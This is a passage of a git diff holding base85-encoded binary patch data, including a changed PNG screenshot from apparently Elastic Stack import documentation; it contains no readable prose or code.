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

diff --git a/doc/ElasticStackImport/09-ImportFinish.png b/doc/ElasticStackImport/09-ImportFinish.png
index 9a5c6df1b3dfb47a48399ae0a1f3646f08775e1d..f9615c6d7bded15f9b4f2605b369fcb8e4ebafc0 100644
GIT binary patch
literal 180280
zcmeFZbyQS+`!@;*QWA=QG!i0>q%_hE0uoZv(%mr(s0c`x(jwj6Dbg+7AkENSGn_rc
zb3ec5yl1`ld#`o=IqR&4wV2s6dw;L*b$zbB_J&|pWf>eSQY<7SBpf+eNi`%S3>Xp;
zsv5?9;2VKoh0#bzSc{et5~^|%64a_r_U4v0W=Ke~!Ep)b8ZkXY{u{TW65{?JR5L#;
zpl+c?KJr4!(t3?4NB#Z7SA6`P?mt+?STw(FmhwLb6fjd;zhcpTZ8Jq|`dW3OBLF83
z3YM9gcVF<{n0J15F39J;*TiM9F6xd%jqd#GkBc^@|AW`@baRWL56Os!T7~bu7en@V
zhgwQrtkI8!gLD70BBZ77x&bM1xQ2zn7<zqs`$ogVhmjcRIr1`HYHSkNL6FnHu_KxV
zNj2zU!z<-@j{tjG#TaTd8ljhMjOsUL0Wr@=inzB3NcO@?pCWlY3Zj)m_BRciBAK3h
zOoz+(*vR^!%5!lKo}YVq$U#9I(Zv0O-QCGcMjw<Of?gn*lK$+^Z26^lse41`>4VE4
zHK-0reB2nJ%A~xp3QN;HZlR~u=S^vULP7_oqb475F}>Z(GP~cS6U!}Xn)tC%?pBVd
z8zm$A8}n&+nmJ_`gRBUjuipVT12%N(=%vn1x8=HmFKxC?Gzr^K9Lu4(5|<2Tj8;4m
zeGT@7jpvQfE7N{%3+x{oDiz$UH19jRbnOzlf3BS#OTi4dJfW-BLy<7ECh=+?yLf6&
zv1YeHMX1k1>u1^Ang(PM`zwMg1oY>`7M?xM!J`suup1Xpoqi(4)3l_I<b&Vpz8?uI
zuAzQX=EArS^G8PU$HS0ud4Q2*8rfl($W!)YU(vBx@+(cZacLx3mqn?RUcvMOU29!k
zq-T5kV^JPtBA)C|ukuKA*C|(@x5(@%_IzQ@d*B~0jx<KqKlQ*JNsJLGy)KYB##Ci`
zm_YQ2m}K(<?sQ}qe`F4{_*SBqC|XOHKCh@TkfW$^Sy1$-kx0Z)oLZeq?>`POE+w%+
zd-IMV_uh5eQwP*ae}bh4wMfPOWJ|an7+!5i9+=Xt-W>N|;p5UsXvp6C{qYMmb~ll+
z_+BLY;|Cul993yzQG%&SD#_ns6G~*M5>}Gs2l)krOIV~UsPef`Z3liz=Nq<of)?|R
zv=E1^-TB?K{(!(GS&yg5DD2?lB@_=@J><!s=*#984}8#?@16f-Uw-{qj4^%lxo|9f
zNbr&L$Miq1d!A!j(dT2l3D1|}$(T`1$<@s@7~|L`APvpVAbGD)$t-|G@o_yPAzdqj
zFTG&+dSqbJc~f^&<OJi2?9-Q#pW5&AIBXPIo}tAAGX9D+IWrD78Z_B^cb{XwOq+$m
zI>7bk{dX&+c~fRnI8(b*&uj#%$z~%cI+h(sUt%Ydv7vUgnJr^E#?=Paj@BmCBG1V*
zq8Jd{hn}~0tw>$?`0&G!V2@$XVElex(j_@)YVpM}gv8m52#oN)hdHEhh&`cYB2fBl
z_e<88$q}b4U`kd<#YfVoAU!?3WT_B8n_5G=NcFpe_Hu@J+E0dPte)gmC3)%|Su(k6
